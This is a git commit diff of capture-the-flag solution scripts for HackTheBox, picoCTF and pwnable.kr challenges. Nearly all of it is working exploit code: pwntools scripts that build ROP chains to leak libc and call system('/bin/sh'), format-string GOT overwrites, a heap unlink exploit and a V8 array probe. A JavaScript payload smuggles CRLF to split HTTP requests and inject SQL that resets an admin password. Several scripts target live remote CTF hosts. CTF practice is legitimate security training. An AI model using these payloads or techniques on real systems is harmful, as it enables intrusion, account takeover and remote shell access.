programmeruser2
diff --git a/Diff for: ‎.gitignore
+1 b/Diff for: ‎.gitignore
+1
diff --git a/Diff for: ‎hackthebox/flag.txt
+1 b/Diff for: ‎hackthebox/flag.txt
+1
diff --git a/Diff for: ‎hackthebox/oxidized-rop.py
+4 b/Diff for: ‎hackthebox/oxidized-rop.py
+4
diff --git a/Diff for: ‎hackthebox/racecar
15.9 KB b/Diff for: ‎hackthebox/racecar
15.9 KB
diff --git a/Diff for: ‎hackthebox/racecar.py
+18 b/Diff for: ‎hackthebox/racecar.py
+18
diff --git a/Diff for: ‎hackthebox/restaurant/flag.txt
+1 b/Diff for: ‎hackthebox/restaurant/flag.txt
+1
diff --git a/Diff for: ‎hackthebox/restaurant/ld-2.27.so
175 KB b/Diff for: ‎hackthebox/restaurant/ld-2.27.so
175 KB
diff --git a/Diff for: ‎hackthebox/restaurant/libc.so.6
17.1 MB b/Diff for: ‎hackthebox/restaurant/libc.so.6
17.1 MB
diff --git a/Diff for: ‎hackthebox/restaurant/restaurant
12.6 KB b/Diff for: ‎hackthebox/restaurant/restaurant
12.6 KB
diff --git a/Diff for: ‎hackthebox/restaurant/restaurant_patched
16.6 KB b/Diff for: ‎hackthebox/restaurant/restaurant_patched
16.6 KB
diff --git a/Diff for: ‎hackthebox/restaurant/solve.py
+20 b/Diff for: ‎hackthebox/restaurant/solve.py
+20
diff --git a/Diff for: ‎hackthebox/weatherapp.js
+10-4 b/Diff for: ‎hackthebox/weatherapp.js
+10-4
diff --git a/Diff for: ‎picoCTF/2021/bizzfuzz
1.05 MB b/Diff for: ‎picoCTF/2021/bizzfuzz
1.05 MB
diff --git a/Diff for: ‎picoCTF/2021/download_horsepower.py
+29 b/Diff for: ‎picoCTF/2021/download_horsepower.py
+29
diff --git a/Diff for: ‎picoCTF/2021/stonk_market.py
+13-34 b/Diff for: ‎picoCTF/2021/stonk_market.py
+13-34
diff --git a/Diff for: ‎picoCTF/exclusive/asciiftw.py
+8 b/Diff for: ‎picoCTF/exclusive/asciiftw.py
+8
diff --git a/Diff for: ‎picoCTF/picoMini-redpwn/fermat-strings
8.55 KB b/Diff for: ‎picoCTF/picoMini-redpwn/fermat-strings
8.55 KB
diff --git a/Diff for: ‎picoCTF/picoMini-redpwn/fermat-strings.py
+13 b/Diff for: ‎picoCTF/picoMini-redpwn/fermat-strings.py
+13
diff --git a/Diff for: ‎picoCTF/picoMini-redpwn/flag.txt
+1 b/Diff for: ‎picoCTF/picoMini-redpwn/flag.txt
+1
diff --git a/Diff for: ‎picoCTF/picoMini-redpwn/libc.so.6
1.94 MB b/Diff for: ‎picoCTF/picoMini-redpwn/libc.so.6
1.94 MB
diff --git a/Diff for: ‎pwnable-kr/flag
-1 b/Diff for: ‎pwnable-kr/flag
-1
diff --git a/Diff for: ‎pwnable-kr/horcruxes.py
+29-7 b/Diff for: ‎pwnable-kr/horcruxes.py
+29-7
diff --git a/Diff for: ‎pwnable-kr/libc.so.6
1.71 MB b/Diff for: ‎pwnable-kr/libc.so.6
1.71 MB
diff --git a/Diff for: ‎pwnable-kr/unlink.py
+7-3 b/Diff for: ‎pwnable-kr/unlink.py
+7-3
@@ -2,5 +2,6 @@
 __pycache__/
 libseccomp.so.2
 node_modules
+picoCTF/2021/horsepower
 
 
@@ -0,0 +1 @@
+HTB{test_flag}
@@ -1,3 +1,7 @@
 from pwn import *
 r = process('./oxidized-rop')
+# use utf-8 4 bytes characters to bypass the length limit since rust stores strings as utf-8
+r.sendline(b'1')
+r.sendline(b'a'*200+b'\x00')
+r.interactive()
 
@@ -0,0 +1,18 @@
+from pwn import * 
+context.log_level = 'debug'
+r = remote('142.93.32.153', 32106)
+#r = process('./racecar')
+#r=gdb.debug('./racecar', 'b *car_menu+828\nc')
+r.recvuntil(b'Name')
+r.sendline(b'name')
+r.recvuntil(b'Nickname')
+r.sendline(b'nick')
+r.recvuntil(b'Car selection')
+r.sendline(b'2')
+r.recvuntil(b'Select car')
+r.sendline(b'1')
+r.recvuntil(b'Circuit')
+r.sendline(b'1')
+r.recvuntil(b'victory?')
+r.sendline(b'%x'*22)
+r.interactive()
@@ -0,0 +1 @@
+HTB{test_flag}
@@ -0,0 +1,20 @@
+from pwn import * 
+context.log_level = 'debug'
+r = remote('206.189.28.180', 30088)
+#r = process('./restaurant_patched')
+#r = gdb.debug('./restaurant_patched', 'set follow-fork-mode child\nb fill\nc')
+e = ELF('./restaurant')
+libc = ELF('./libc.so.6')
+def send(b):
+    r.sendlineafter(b'>', b)
+
+send(b'1')
+send(b'$\x00' + b'a'*(0x20+8-2) + p64(0x00000000004010a3) + p64(e.got['puts']) + p64(e.plt['puts']) + p64(e.sym['fill']))
+r.recvuntil(b'$')
+puts_addr = u64(r.recv(6) + b'\x00\x00')
+print(f'puts_addr = {hex(puts_addr)}')
+libc.address = puts_addr - libc.sym['puts']
+print(f'libc.address = {hex(libc.address)}')
+send(b'a'*(0x20+8) + p64(0x00000000004010a3) + p64(next(libc.search(b'/bin/sh\x00'))) + p64(0x000000000040063e) + p64(libc.sym['system']))
+
+r.interactive()
@@ -1,23 +1,29 @@
-const host = 'http://localhost:1337'
+//const host = 'http://localhost:1337'
+const host = 'http://206.189.24.162:32104'
 //const injection = "bar'); update users set password='foo' where username='admin' --";
 const injection = "'),('admin', 'foo') on conflict(username) do update set password='foo'--";
 const crlf = '\u{010D}\u{010A}'
 const space = '\u{0120}'
 const query = `username=foo&password=${encodeURIComponent(injection)}`;
 let payload = [
   `x${space}HTTP/1.1`,
-  `Host:${space}127.0.0.1:80${crlf}`,
+  `Host:${space}127.0.0.1:80`,
+  `Content-Length:${space}0`,
+  '',
   `POST${space}/register${space}HTTP/1.1`,
   `Host:${space}127.0.0.1:80`,
   'Content-Type:'+space+'application/x-www-form-urlencoded',
-  `Content-Length:${space}${query.length+24}`,
+  `Content-Length:${space}${query.length+14}`,
+  '',
+  query,
   '',
-  query
+  `GET${space}/placeholder`
 ];
 payload = payload.join(crlf);
 console.log(payload);
 console.log(encodeURIComponent(payload))
 console.log(Buffer.from(payload, 'latin1').toString('latin1'))
+console.log(Buffer.from(payload))
 const params = {
   endpoint: encodeURIComponent('127.0.0.1:80'),
   city: encodeURIComponent(payload),
 
@@ -0,0 +1,29 @@
+from pwn import * 
+code = b'''
+var tbuf = new ArrayBuffer(8);
+var f64_buf = new Float64Array(tbuf);
+var u64_buf = new Uint32Array(tbuf);
+
+function ftoi(val) { // typeof(val) = float
+    f64_buf[0] = val;
+    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n); 
+}
+
+function itof(val) { 
+    u64_buf[0] = Number(val & 0xffffffffn);
+    u64_buf[1] = Number(val >> 32n);
+    return f64_buf[0];
+}
+function dbg(x) {
+	console.log(ftoi(x).toString(16))
+}
+const buf = [1.1];
+buf.setHorsepower(100);
+dbg(buf[1])
+dbg(buf[2])
+'''
+r = remote('mercury.picoctf.net', 60233)
+r.sendline(str(len(code)).encode())
+r.sendline(code)
+r.interactive()
+
@@ -1,43 +1,22 @@
 from pwn import *
 e = ELF('./stonk_market')
-r = process('./stonk_market')
+#r = process('./stonk_market')
+r = remote('mercury.picoctf.net', 5654)
 context(arch='amd64', os='linux')
-#gdb.attach(r, 'break buy_stonks')
-#print({e.got['fflush']: e.symbols['buy_stonks']})
-#print(p64(e.symbols['buy_stonks']), p64(e.plt['system']), p64(e.got['fflush']), p64(e.got['printf']))
-#payload = fmtstr_payload(5, {e.got['fflush']: e.symbols['buy_stonks'], e.got['printf']: e.plt['system']})
-# %12$n for main rbp writes
-# which then writes to %20$n 
-# %14$n writes to %55$n
-def write_to(addr, val):
-	payload = ''
-	lower = val&0xffff 
-	higher = val>>16
-	#print(hex(lower), hex(higher))
-	s = 0
 
-	payload += f'%{addr}c%12$lln'
-	s += addr 
-	payload += f'%{2}c%14$lln'
-	s += 2
-
-	diff1 = (lower-s)%0xffff
-	payload += f'%{diff1}c%20$hn' 
-	s+=diff1 
+payload = ('%c'*(5+7-2) + f"%{e.got['free']-10}c%lln" + '%c'*(8-2) + f"%{((e.sym['buy_stonks'] - e.got['free'])%(0xffff+1))-6}c%hn").encode()
+print(payload)
+r.sendline(b'1')
+r.sendline(payload)
 
-	diff2 = (higher-s)%0xffff 
-	payload += f'%{diff2}c%55$hn'
-	s+=diff2
+payload = (f"%{e.got['printf']}c%12$lln").encode()
+print(payload)
+r.sendline(b'1')
+r.sendline(payload)
 
-	return payload.encode()
-# 1. write
-# 2. get shell 
-payload = write_to(e.got['free'], e.sym['buy_stonks'])
-print('payload 1', payload)
+payload = (f"%{e.plt['system']}c%18$lln").encode()
+print(payload)
 r.sendline(b'1')
 r.sendline(payload)
-payload = f''.encode()
-print('payload 2', payload)
-r.sendline(b'/bin/sh')
-#r.interactive()
 
+r.interactive()
@@ -0,0 +1,8 @@
+code = b'\xc6\x45\xd0\x70\xc6\x45\xd1\x69\xc6\x45\xd2\x63\xc6\x45\xd3\x6f\xc6\x45\xd4\x43\xc6\x45\xd5\x54\xc6\x45\xd6\x46\xc6\x45\xd7\x7b\xc6\x45\xd8\x41\xc6\x45\xd9\x53\xc6\x45\xda\x43\xc6\x45\xdb\x49\xc6\x45\xdc\x49\xc6\x45\xdd\x5f\xc6\x45\xde\x49\xc6\x45\xdf\x53\xc6\x45\xe0\x5f\xc6\x45\xe1\x45\xc6\x45\xe2\x41\xc6\x45\xe3\x53\xc6\x45\xe4\x59\xc6\x45\xe5\x5f\xc6\x45\xe6\x37\xc6\x45\xe7\x42\xc6\x45\xe8\x43\xc6\x45\xe9\x44\xc6\x45\xea\x39\xc6\x45\xeb\x37\xc6\x45\xec\x31\xc6\x45\xed\x44\xc6\x45\xee\x7d'
+i = 3 
+flag = b''
+while i < len(code):
+    flag += bytes([code[i]])
+    i += 4 
+print(flag)
+
@@ -0,0 +1,13 @@
+from pwn import *
+context.log_level = 'debug'
+#r = process('./fermat-strings')
+r = gdb.debug('./fermat-strings', 'b *0x4009d2 \n c')
+e = ELF('./fermat-strings')
+libc = ELF('./libc.so.6')
+# %10$p for the start of our input
+fmt, addr = fmtstr_split(10, {e.got['pow']: e.sym['main']}, numbwritten=8, badbytes=b'\x00')
+payload = b'1'*8 + fmt
+print(payload)
+r.sendline(payload)
+r.sendline(b'1')
+r.interactive()
@@ -0,0 +1 @@
+picoCTF{test_flag}
@@ -1,2 +1 @@
 ctf{test_flag}
-
@@ -1,11 +1,33 @@
 from pwn import *
+from numpy import int32
 context.clear(arch='i386', os='linux')
+context.log_level = 'debug'
 context.binary = e = ELF('./horcruxes')
-rop = b'a' * (0x74 + 4+1)
-# last gadget -> go back to ropme
-rop += p32(0x0809fffc) 
-print(rop)
-#r = gdb.debug('./horcruxes', 'break ropme')
-r = process('./horcruxes')
-r.sendline(rop)
+clean_main = p64(0x0809fffc) # do ropme again
+rop = ROP(e, badchars='\x0a\x0d')
+rop.raw(b'\x00'*(0x74+4))
+rop.A()
+rop.B()
+rop.C() 
+rop.D()
+rop.E()
+rop.F()
+rop.G()
+rop.raw(clean_main)
+#print(rop.dump())
+#print(rop.chain())
+#r = process('./horcruxes', env={'LD_PRELOAD': './libseccomp.so.2'})
+#r = gdb.debug('./horcruxes', 'break *0x080a0176\ncontinue', env={'LD_PRELOAD': './libseccomp.so.2'})
+r = remote('pwnable.kr', 9032)
+r.sendline(b'0')
+r.sendline(rop.chain())
+s = int32(0)
+for _ in range(7):
+	n = int32(r.recvuntil(b')', drop=True).split(b'+')[1])
+	#print(n)
+	s += n 
+
+print(s)
+r.sendlineafter(b':', b'0')
+r.sendlineafter(b':', str(s).encode())
 r.interactive()
@@ -1,13 +1,17 @@
 from pwn import *
 s = ssh(host='pwnable.kr', port=2222, user='unlink', password='guest')
 r = s.process('./unlink')
+#r = process('./unlink')
+#r = gdb.debug('./unlink', 'b unlink\nc')
+e = ELF('./unlink')
 r.recvuntil(b'stack address leak: ')
-rbp = int(r.recvline(), 16) + 0x14
-print(f'rbp = {hex(rbp)}')
+ebp = int(r.recvline(), 16) + 0x14
+print(f'ebp = {hex(ebp)}')
 r.recvuntil(b'heap address leak: ')
 heapleak = int(r.recvline(), 16)
 print(f'A = {hex(heapleak)}')
-payload = b'a' * 0x10 + p32(rbp + 1) + p32(heapleak - ((heapleak-0x2f)%0xff))
+payload = p32(e.sym['shell']) + b'a'*(0x20-0x4-0x8-0x8) + p32(ebp-0x8) + p32(heapleak+0x4+0x8)
 print(payload)
 r.sendline(payload)
 r.interactive()
+